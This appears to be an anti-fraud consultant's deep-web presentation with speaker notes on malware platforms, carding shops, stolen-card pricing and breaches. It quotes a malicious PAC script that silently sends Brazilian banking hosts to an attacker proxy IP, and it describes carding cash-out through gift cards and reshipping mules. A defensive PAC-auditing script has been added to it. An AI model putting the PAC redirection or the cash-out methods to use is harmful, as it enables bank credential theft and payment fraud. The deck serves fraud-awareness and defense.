What’s lurking in the deep end of the Internet?
The Deep Web
Joshua Schleicher
Anti-Fraud Solutions Consultant
info@easysol.net
95% of the ocean remains
unexplored, unseen by human
eyes
http://oceanservice.noaa.gov/facts/exploration.html
Just like an iceberg, the
majority of the Deep Web
remains obscured from view
Google has only indexed 200TB of
the Internet's data...an estimated
.004% of the total Internet
Source: https://hewilson.wordpress.com/what-is-the-deep-web/statistics/
Source: http://money.cnn.com/infographic/technology/what-is-the-deep-web/
These search engines capture < 1% of all web content
Source: http://money.cnn.com/infographic/technology/what-is-the-deep-web/
The Deep Web
The Deep Web is truly
anonymous – you can’t even get
on it unless you yourself are
anonymous
Users can buy virtually anything
from drugs to credit card
information and accounts
Source: http://www.sickchirpse.com/deep-web-guide/2/
The recent evolution of the Deep Web has allowed
fraud to become increasingly commoditized,
simply because there are many ways to monetize
the fraud process itself.
The Process
Information Theft
Black Market Sale
Cybercrime Platforms
> Data Stealer SDK
> VOLK
> Webshells
> Zeus
> SpyEye
> Citadel
> ICE IX
> BlackHole Exploit Kit
> iBanking (Mobile Botnet)
> Malware Targeting POS
Mobile Crimeware Platforms are being used to harvest
credentials to infiltrate accounts.
PAC (Proxy Autoconfiguration) Attacks
function FindProxyForURL(url, host)
{
    // ---- Santander
    if (shExpMatch(host, "www.santander.com.br")) {
        return "PROXY 201.20.46.177:80";
    }
    if (shExpMatch(host, "santander.com.br")) {
        return "PROXY 201.20.46.177:80";
    }
    if (shExpMatch(host, "www.banespa.com.br")) {
        return "PROXY 201.20.46.177:80";
    }
    if (shExpMatch(host, "banespa.com.br")) {
        return "PROXY 201.20.46.177:80";
    }
}
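A PAC script like the one on this slide proxies only a handful of targeted hosts, so a defender can audit a collected PAC file by evaluating it against a watchlist of hostnames and flagging any that are routed to a proxy outside the sanctioned list. The following is an added example, not part of the original slides; the hostnames, proxy addresses and the `auditPac` and `proxyTargets` helpers are constructed for illustration.

```javascript
// Added example: audit a PAC script for selective redirection of watched hosts.
// All hostnames, addresses and function names below are constructed.
const vm = require('node:vm');

// PAC helper functions a script may call. They are injected as source text so
// they are created inside the analysis context, not shared from the host realm.
function shExpMatch(str, pattern) {
  // Shell-style glob: '*' matches any run of characters, '?' exactly one.
  var re = pattern.replace(/[.+^$(){}|[\]\\]/g, '\\$&')
                  .replace(/\*/g, '.*')
                  .replace(/\?/g, '.');
  return new RegExp('^' + re + '$').test(str);
}
function dnsDomainIs(host, domain) {
  return host.length >= domain.length &&
         host.substring(host.length - domain.length) === domain;
}
function isPlainHostName(host) {
  return host.indexOf('.') === -1;
}
const PAC_HELPERS = [shExpMatch, dnsDomainIs, isPlainHostName].map(String).join('\n');

// Extract "host:port" from every proxy directive in a PAC return value.
// "DIRECT" and a missing return (undefined) yield an empty list.
function proxyTargets(verdict) {
  return String(verdict).split(';')
    .map((part) => /^(?:PROXY|HTTPS?|SOCKS[45]?)\s+(\S+)$/i.exec(part.trim()))
    .filter(Boolean)
    .map((m) => m[1].toLowerCase());
}

// Evaluate pacSource for each watched host and report proxies that are not
// sanctioned. node:vm is not a security boundary; run this on an analysis machine.
function auditPac(pacSource, watchHosts, sanctionedProxies) {
  const allowed = new Set(sanctionedProxies.map((p) => p.toLowerCase()));
  const context = vm.createContext(Object.create(null));
  const opts = { timeout: 200 }; // milliseconds; aborts scripts that loop
  vm.runInContext(PAC_HELPERS + '\n' + pacSource, context, opts);
  const findings = [];
  for (const host of watchHosts) {
    context.probeHost = host;
    context.probeUrl = 'https://' + host + '/';
    const verdict = vm.runInContext(
      'String(FindProxyForURL(probeUrl, probeHost))', context, opts);
    for (const proxy of proxyTargets(verdict)) {
      if (!allowed.has(proxy)) findings.push({ host, proxy });
    }
  }
  return findings;
}

// Constructed sample: two banking hosts sent to an unknown proxy, corporate
// hosts sent to the sanctioned proxy, and no return value for anything else.
const SAMPLE_PAC = `
function FindProxyForURL(url, host) {
  if (shExpMatch(host, "www.bank.example")) {
    return "PROXY 203.0.113.77:80";
  }
  if (shExpMatch(host, "bank.example")) {
    return "PROXY 203.0.113.77:80";
  }
  if (dnsDomainIs(host, ".corp.example")) {
    return "PROXY proxy.corp.example:8080";
  }
}`;
const WATCHLIST = ['www.bank.example', 'bank.example',
                   'intranet.corp.example', 'www.example.org'];
const SANCTIONED = ['proxy.corp.example:8080'];

console.log(auditPac(SAMPLE_PAC, WATCHLIST, SANCTIONED));
```

Because the script is evaluated rather than pattern-matched, the check reports what the PAC file actually returns for each watched host, regardless of how its rules are written.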
Fraudsters have succeeded at breaching
big-name merchants
The Process
Information Theft
Black Market Sale
Easy Checkout
Customer Support
Money Back Guarantee
Technical Support
Shopping Online with the Deep Web
The Hidden Wiki
Resource for finding hacking databases and credit card sale sites
Online Card Shops
Factors affecting Price:
• Validity Rate
• Supply and Demand
• Issuing Region
How much is a card worth?
Source: http://krebsonsecurity.com/2014/02/fire-sale-on-cards-stolen-in-target-breach/
How much is Healthcare data worth?
In 2015 – The cost of just one
Medicare number, $470
Source: http://www.npr.org/sections/alltechconsidered/2015/02/13/385901377/the-black-market-for-stolen-health-care-data
Cashing In
Image Source: http://www.tripwire.com/state-of-security/vulnerability-management/how-stolen-target-credit-cards-are-used-on-the-black-market/
Silk Road
The most famous online drug market that was shut down
in 2013 by the FBI
Down the Rabbit Hole, The Front Door
Welcome to the Jungle
IRS & the Federal Office of Personnel Management
recently fell victim to breaching and Deep Web
information trading.
My Two Cents
• Tackle the problem from beginning to end
• Look for constant innovation
• Speed and flexibility are critical when fighting back fraud
• Ask for references – especially when something bad happens
• There is no silver bullet
Questions?
Joshua Schleicher
Anti-Fraud Solutions Consultant
info@easysol.net

The Deep Web - What's Lurking in the Deep End of the Internet

Editor's notes

  1. Throughout history, the ocean has been a vital source of sustenance, transport, commerce, growth, and inspiration. Yet for all of our reliance on the ocean, 95 percent of this realm remains unexplored, unseen by human eyes. http://oceanservice.noaa.gov/facts/exploration.html
  2. The Deep Web is a collection of different web sites, academic databases, corporate intranets and also criminal databases, marketplaces and forums. The owners of each site have different incentives, from guarding intellectual property to hiding criminal activity from law enforcement. Read more: http://www.cheatsheet.com/business/a-look-inside-the-deep-web.html/?a=viewall#ixzz3cmJhoOmN
  3. Exactly how large is the Deep Web? If the glacier analogy did not make a big enough impact on the imagination, the following statistics should help put the immensity of the Deep Web into perspective. – The Deep Web has between 400 and 550 times more public information than the Surface Web. – Together, the 60 largest Deep Web sites contain around 750 terabytes of data, surpassing the size of the entire Surface Web 40 times. – 550 billion individual documents can be found on the Deep Web compared to the Surface Web’s 1 billion individual documents. Source: https://hewilson.wordpress.com/what-is-the-deep-web/statistics/
  4. Search engines like Google and Bing crawl the web and index linkable sites. This allows casual internet users to find the majority of the content that people use on a daily basis. These search engines capture less than 1% of all web content. Things like databases and private academic journals are often not indexed by these search engines, and these make up a considerable amount of data content on the internet. This content is available via targeted browsing or behind paywalls in the case of academic resources.
  5. The main topic of discussion today is going to be the deepest part of the internet, known as the deep web or dark web, among other names. The deep web is only accessible using specific, anonymizing technologies and is the portion of the internet that houses the most sinister functions of the internet, such as forums for the distribution of illegal drugs, pornography, and stolen goods.
  6. The deep web is truly anonymous; you can’t even get on it unless you yourself are anonymous. Your location and browsing habits cannot be picked up. It can only be accessed through a deep web browser, not a normal browser such as Firefox. The most popular browser is called Tor. http://www.sickchirpse.com/deep-web-guide/
  7. The Deep Web is filled with illegal things such as drugs, hitmen for hire, weapons and credit card information. You can get access to business credit card accounts and infinite credit card accounts. Most things on the deep web are paid for with bitcoins, which use a system similar to PayPal: it uses cryptography, the practice of hiding information, to oversee the transfer of money. Transactions are irreversible and verified within anywhere between 10 minutes to an hour. The Bitcoin network is decentralized, making these transactions solely peer-to-peer. The exchange rate changes from day to day. This encourages illegal behavior because the authorities cannot track where the money goes.
  8. Downloads of deep web browsers soared in August by almost 100% as the general population became more concerned about privacy amid talk of US intelligence agencies monitoring web traffic http://www.sickchirpse.com/deep-web-guide/2/
  9. In order for credentials to be sold on the Deep Web, credentials must first be harvested and there are a variety of means for this to be accomplished. We are seeing increased complexity in the methods used by fraudsters to harvest credentials, from routine “mass” phishing schemes to more targeted blended malware attacks.
  10. Here are some examples of advanced malware that can be used to compromise accounts and harvest credentials. Theft of information is done in a wide variety of ways, but large-scale data breaches form the foundation of the black market economy formed around payment card fraud. Recent breaches have been the result of malware that has been placed on Point of Sale systems, often in situations where the breached organizations have been certified by 3rd parties as having the appropriate security controls in place. These generally occur on secured and segmented internal networks, which require the fraudsters to perform multiple levels of infiltration to reach the POS systems: access the internal network, map the network and identify the secured payments segment, then infect POS terminal devices. This is a sophisticated attack. Recent breaches have also employed RAM-scraping malware for collection of unencrypted, plain-text CC data as it passes through the POS machine memory. Data Exfiltration: In order to collect the data, it must then be extracted from the internal network. This requires the fraudsters to bypass additional security controls such as Data Loss Prevention tools and outbound firewall rules. Bypassing these security controls can involve an additional piece or pieces of malware designed with the intent of storing and moving data from the internal networks through the firewall. Once the data leaves the internal network it is transferred to a drop site, which is frequently a simple FTP server controlled by the fraudster. The Target breach, for example, employed 3 pieces of malware, both known and unknown. Several of these installations were detected by an existing Intrusion Detection System, but these alerts were ignored. 11 GB of data was ultimately extracted in this manner during the course of the Target breach.
  11. As mobile increases in popularity, we are seeing it targeted more as a means to harvest credentials. Crimeware platforms can be used to find second factors of authentication, such as SMS, to infiltrate accounts.
  12. A user is infected through a drive-by attack or by other malware, and a malicious PAC file is installed onto their computer. When the victim visits a targeted website, their browser is redirected to a fake website that will record their login details. The infection is silent; the user is not notified of the change in configuration. The web site will look almost completely legitimate. http://blogs.technet.com/b/mmpc/archive/2014/02/28/malicious-proxy-auto-config-redirection.aspx
  13. After several years of a relatively low-and-slow assault on retail point-of-sale systems, fraudsters have succeeded at breaching several big-name merchants. And as a result, their crimes are now considered mainstream news. People who never considered payments security before are now talking about POS, PCI and EMV.
  14. Finding information on the Deep Web is easy; many sites are equipped much like legitimate sites, with customer service, easy checkout, technical support and even money back guarantees!
  15. The first thing a credit card buyer would focus on is finding a place to purchase from. This is relatively easy, as there are resources such as the Hidden Wiki to help. The Hidden Wiki is comparable to Wikipedia. You can find links to hacking databases there. It is also a way to find credit card sale sites and forums, which are a major problem for financial institutions around the globe. Let’s expand on the market for stolen credit card data.
  16. The sale of credit card information is done in various ways, but recent years have seen the rise of online card shops that are designed to provide a forum for sellers and buyers to meet and exchange these numbers in a secure manner. Previously the more common way was to contact sellers via ICQ or Jabber clients, but this seems to have given way to the even more anonymized carding sites. These shops also leverage cryptocurrencies such as Bitcoin to further anonymize the financial transactions on the site. These shops provide detailed information on each card or group of cards being purchased, including information on issuing bank, cardholder, and BIN. These shops also use names for large-scale influxes of cards as a sort of marketing tool to entice buyers to purchase the most effective card dumps, names like Barbarossa, Tortuga, and Tripoli. Recently these forums have been found to be employing tactics that are really only seen in the large retailers they steal from, such as one-click buying, easy checkout, robust customer service, and instant refunds for customers that purchase a card number that has been cancelled by the issuer. <Click through to graphic> In summary, the markets and forums in which stolen payment card data is sold are becoming increasingly sophisticated, and this trend will only continue as large-scale data breaches become more prevalent.
  17. Factors that affect the price of a stolen card: Validity Rate – the older a breach is, the more likely the card is to have been cancelled. The above graphic illustrates the rapid decline in validity rates for the Target breach over time, which correlates directly to the average prices for the cards being sold. Supply and Demand – As in any economy, the main forces driving the price of the commodity are supply and demand. In the case of large breaches like Target, the cards were placed on carding sites and forums over time in several batches to increase salability. Region – While this variance is also explained by supply and demand, the fact of the matter is that Based on this information, cards can be worth anywhere from $1 to $120, with European cards from new breaches fetching the highest prices per card. The large variance in the aforementioned factors accounts for the large range of prices.
  18. 22 Bitcoins, exchange rate at the time of sale. Valid seller with 5 star rating!!
  19. There are any number of methods of cashing in on stolen credit card information, from the very simple to the very complex. The simplest would be an ATM transaction for a debit card which was stolen and sold with available PIN information. The Credit to Gift Card Shell Game – Find the Fraud! One lucrative method of “carding” involves a shell game, where stolen credit cards are used to charge pre-paid cards. These cards are then used to purchase store-specific gift cards, such as from Amazon for example. Shopping & Reshipping: The carder then uses that gift card to purchase high value goods, usually electronics such as cell phones, computers and game consoles. This process makes it difficult for companies to trace. By the time it is figured out and the cards blocked, the criminal is in possession of the purchased goods. These packages are usually then shipped via a re-shipping scam. Unsuspecting individuals are recruited as mules (re-shippers), usually through legitimate channels such as Craigslist job listings promising “easy work-from-home jobs”, and usually in the United States as it raises fewer red flags. The re-shipper then assembles multiple packages and ships them, usually outside the country, or directly to someone who purchases the goods from an auction site the fraudster has posted the goods to. Reselling Goods for Profit: The carder may then sell the electronics through legitimate channels such as eBay, or to avoid risk can sell the goods through a hidden underground “deep web” site. Most people know the “deep web” from the Silk Road, which was recently shut down by the FBI, reappeared and then vanished again. The Silk Road was an online marketplace for illegal products such as drugs. However, the Silk Road had somewhat of a code of ethics, as certain products were restricted from sale such as pornography, weapons, personal data (stolen credit cards, passwords etc), poisons, or weapons.
There are many hidden services available that do not have such scruples. There are numerous places on the deep web that sell stolen credit cards and goods acquired through carding. On these hidden illegal websites the goods are usually sold at deep discounts on the black market, usually around 50% of retail, and reshipped or sent to a secure drop (vacant house etc) a purchaser has set up for this purpose.
  20. Silk Road was the most famous online drug market until the FBI shut it down in 2013. It had a 97% success rate, meaning 97% of all transactions were completed successfully. It was set up like eBay or Amazon, with a heavy focus on user feedback for buyers and sellers. It had been open since 2011. Buyers could get virtually any kind of drug in any quantity they desired.
  21. Accessing the Deep Web is relatively simple through use of a TOR Browser, short for “The Onion Router”. The TOR network effectively anonymizes users and services by moving their traffic across numerous TOR network servers and by encrypting the traffic data so that it cannot be traced. Anyone attempting to view or analyze the traffic simply sees traffic coming from random nodes on the TOR network as opposed to the traceable IP information that would identify users browsing the common internet.
  22. The deep web is also the place to encounter professional hackers and fraudsters for hire, who can perform a wide variety of attacks to compromise a target of your choice. All transactions are conducted with cryptocurrencies, and the services available may include: account takeover for social media or banking sites; tracking of mobile devices for surveillance; webserver hacking or DDoS attacks; even tracking of someone who committed fraud against you – FIND YOUR SCAMMER. The availability of these services has created a world in which you do not need “blackhat” hacking skills to run attack campaigns but instead only the ability to pay for a phishing or malware kit. This has been an important aspect in the proliferation of cyber attacks against corporations and financial institutions around the world.
  23. If we are viewing the deep web as a sort of illegal goods superstore, then one of the more common goods to find there would be firearms. Prohibition or restriction on the purchase of firearms varies worldwide, and as a result black markets are created to illegally bypass those restrictions. Dark web operators sanitize the firearms by removing serial numbers and then sell to anyone with the cash to pay for the weaponry. Items sold on the dark web include firearms that are restricted from being sold to the public, such as fully automatic or high-caliber weaponry, to more common weapons being sold to criminals or other individuals who are restricted from purchasing firearms in their country.
  24. Fake documents are also widely available on the deep web, and many of these vendors claim to be able to furnish fully functional passports, drivers licenses and social security numbers for people looking to falsify citizenship or enter a country under false pretenses. This is clearly a significant concern for those governments who are fighting against problems like terrorism and large-scale drug trade, as they often use border checkpoints to monitor the movement of key individuals around the globe. Often the generation of these documents can lead back to breaches of government or healthcare sites that contain Social Security numbers that can then be used to generate fake documents.
  25. While corporate breaches often grab the most significant headlines, governmental organizations are also vulnerable to attacks that lead to information being sold on the deep web black markets. Earlier this year, the IRS encountered over 200,000 attempts to file falsified tax returns, and found that over one hundred thousand accounts had been compromised, which included personal information such as SS#, DOB and Street Address. In these instances, the criminals were able to get around the multi-step authentications with personal information about the taxpayer. And just recently the federal Office of Personnel Management was breached, potentially exposing the private data of over 4.1 million federal government employees (over 2 decades). This includes extremely sensitive data and personal information, and it has already been discovered being actively traded in the darknet. Criminals will parse out the most valuable data and sell to interested parties, much as they do with CCs that are sold in batches.